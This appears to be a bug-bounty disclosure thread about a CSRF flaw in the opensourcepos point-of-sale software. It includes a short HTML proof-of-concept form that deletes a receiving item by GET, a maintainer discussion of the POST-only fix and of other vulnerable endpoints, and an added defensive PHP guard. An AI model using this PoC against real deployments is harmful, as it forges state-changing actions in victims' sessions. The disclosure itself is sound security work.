Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021


Description

You have not set any CSRF protection for the receivings/delete_item/{item_id} endpoint.

Proof of Concept

// PoC.html

<html>
  <body>
    <!-- Replaces the URL shown in the address bar with "/" while the page is open -->
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the form submits with GET; the endpoint accepted it
         with the victim's session cookie and without any anti-CSRF token -->
    <form action="https://dev.opensourcepos.org/receivings/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the opensourcepos team and are waiting to hear back 22 days ago
jekkos
22 days ago

The fix should include this protection. The method is POST only now.

jekkos
22 days ago

https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8

amammad
22 days ago

Researcher


I tested this on dev.opensourcepos.org.

Is this instance still vulnerable?

amammad
22 days ago

Researcher


I tested this endpoint and it still uses GET:

/sales/complete

and vulnerable to CSRF

jekkos
22 days ago

It might have another build deployed now

jekkos
22 days ago

I'm redeploying... you can retry in 10 mins.

amammad
22 days ago

Researcher


As I said, I tested again just now and this endpoint is still vulnerable to CSRF:

/receivings/complete

because it accepts the GET method besides POST.
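A server-side guard of the kind the fix describes (POST-only routes, plus a CSRF token check that the GET-accepting endpoints noted above lacked), as an added example that is not code from this thread or from the opensourcepos project; the route list, the csrf_token field name and the session-token handling are assumptions.

```php
<?php
// Added example, not OSPOS code: a request guard in the spirit of the method
// hook the fix points at. Two checks for state-changing routes: (1) the method
// must be POST, so a cross-site <form>/<img> navigation cannot trigger the
// action; (2) the POST body must carry a CSRF token matching the session's.
// Route names and the 'csrf_token' field are assumptions for illustration.
const MUTATING_ROUTES = [          // constructed list of mutating route prefixes
    'receivings/delete_item',
    'receivings/complete',
    'sales/complete',
];
function is_mutating_route(string $path): bool {
    $path = ltrim($path, '/');
    foreach (MUTATING_ROUTES as $prefix) {
        if ($path === $prefix || strpos($path, $prefix . '/') === 0) {
            return true;
        }
    }
    return false;
}

// Returns 'allow' or a short reason string explaining the rejection.
function guard_request(string $method, string $path, array $post, string $session_token): string {
    if (!is_mutating_route($path)) {
        return 'allow';            // read-only route: nothing to protect
    }
    if (strtoupper($method) !== 'POST') {
        return 'reject: method';   // GET can be forged by a plain cross-site link
    }
    $token = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time, so timing does not leak the token.
    if ($token === '' || !hash_equals($session_token, $token)) {
        return 'reject: csrf';
    }
    return 'allow';
}

// Demonstration over constructed requests; the first mirrors the PoC form.
$session_token = bin2hex(random_bytes(16));
$cases = [
    ['GET',  '/receivings/delete_item/1', []],
    ['GET',  '/receivings/complete',      []],
    ['POST', '/receivings/complete',      []],                               // no token
    ['POST', '/receivings/complete',      ['csrf_token' => $session_token]],
    ['GET',  '/items',                    []],
];
foreach ($cases as [$m, $p, $post]) {
    printf("%-4s %-28s -> %s\n", $m, $p, guard_request($m, $p, $post, $session_token));
}
```

Run with `php guard.php`: the three forged or token-less requests print a reject reason and only the POST carrying the session token is allowed.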

amammad
22 days ago

Researcher


I tested receivings/delete_item/{id} and it is OK, jekkos.

19 days ago

OK great thanks!

opensourcepos/opensourcepos maintainer validated this vulnerability 19 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos confirmed that a fix has been merged on e8f27f 18 days ago
jekkos has been awarded the fix bounty